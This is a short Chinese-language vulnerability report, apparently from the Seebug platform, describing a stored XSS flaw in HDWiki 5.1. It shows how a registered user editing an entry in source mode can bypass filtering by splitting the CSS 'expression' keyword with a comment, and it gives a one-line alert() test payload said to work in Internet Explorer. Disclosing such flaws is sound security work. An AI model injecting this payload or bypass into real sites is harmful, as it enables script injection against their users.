### 简要描述:
hdwiki5.1储存型xss跨站漏洞
### 详细说明:
注册会员-编辑词条或者创建词条-编辑框选择源代码
可以利用在expression中插入注释比如:expr/*XSS*/ession 造成XSS漏洞 测试代码如下
<img style="xss:expr/*xss*/ession(alert('xss'))">
ie 浏览器下有效
[<img src="https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg)
[<img src="https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/17114017a02ad0829b99da5dcf7faac2ae5699b2.jpg)
[<img src="https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/1711402709f0a78d4b3d3fd67490d3666828614a.jpg)
京公网安备 11010502034610号
暂无评论